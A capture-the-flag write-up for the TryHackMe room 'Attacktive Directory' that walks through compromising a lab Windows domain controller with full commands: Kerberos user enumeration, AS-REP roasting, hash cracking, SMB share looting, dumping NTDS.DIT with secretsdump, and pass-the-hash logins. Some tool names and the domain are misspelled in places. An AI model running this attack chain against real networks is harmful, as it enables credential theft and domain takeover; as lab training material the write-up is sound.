Attacking Active Directory — TryHackMe
Hey guys, this is a write-up for the TryHackMe room “Attacktive Directory”. On this room we are going to exploit a vulnerable Domain Controller (DC).
Prerequisite
Install: Impacket and Kerbrute
Enumeration
Starting off, we are going to use Nmap to enumerate this machine
nmap -sC -sV 10.10.2.10 -vv
Useful info:
Port 88: Kerberos-sec
Port 389: LDAP
DNS Domain: spookysec.local
DNS Computer Name: AttacktiveDirectory.spookysec.local
Enumerating Users with Kerbrute
After installing Kerbrute we are going to use the userenum command with the user list that the creator of the room provided us to find valid username on the domain.
./kerbrute userenum — dc spookysec.local -d spookysec.local ‘/root/attacktivedirectory/users.txt’ -t 100
From the results above, two important users are “svc-admin” and “backup”.
Exploitation
After enumerating we will try to exploit a feature of Kerberos with an attack called “ASReproasting”.
ASReproasting occurs when a user account has the privilege “Does not require Pre-Authentication” set. This means that the account does not need to provide valid identification before requesting a Kerberos Ticket on the specified user account.
We are going to use GetNUPusers.py tool found in the “impacket” folder to find the password hash of the user “svc-admin” from the Key Distribution Cente (KDC).
GetNUPsers.py -dc-ip 10.10.2.10 spookysec.local/svc-admin -no-pass
Then, we are going to use johnTheRipper to crack the hash
john hash — wordlist=pass.txt
Now that we have the credentials for the “svc-admin” user, we can enumerate SMB shares to check if there is any useful information.
smbclient -L \\\\10.10.2.10\\ -U svc-admin → to list shared folders
There are some common shared folders like C$, IPC$, NETLOGON, etc.
The folder “backup” seems interesting.
smbclient \\\\10.10.2.10\\backup -U svc-admin → to connect to the server using smb
Inside the folder there is an interesting file:
Inside the file there is a base64 encoded text:
echo “YmFja3VwQHNwb29reXNlYy5sb2NhbDpiYWNrdXAyNTE3ODYw” | base64 -d → to decode it
The results are the credentials of the user “backup@spookysec.local”.
Privilege Escalation
We are going to use a tool from impacket called secretsdumb.py. Using this tool, we are dumping the NTDS.DIT which contained the hashes of every user on the domain. Pen-testers use this tool for password auditing. They start cracking the hashes to check if the users are using a strong password.
Within impacket there is a tool called secretsdump.py that can give us all the password hashes for the users synced with Active Directory.
secretsdump.py spookeysec.local/backup:‘backup2517860’@10.10.2.10 -just-dc
We found the password hash of the local admin profile. We can use it to connect to the domain controller with administrator privileges.
We can use the method pass the hash for the local admin account because we have the local admin hash from the secredump.py we did earlier.
Pass the Hash is a hacking technique that allows an attacker to authenticate to a remote server or service by using the underlying NTLM or LanMan hash of a user’s password, instead of requiring the associated plaintext password as is normally the case.
To connect to the server we can use psexec.py or evil-winrm:
psexec.py Administrator@10.10.2.10 -hashes <HASH>
OR
evil-winrm -i 10.10.2.10 -u Administrator -H <HASH>
The flags are located to the /Desktop directory of each user.
Capturing the flags brings us to the completion of the room.
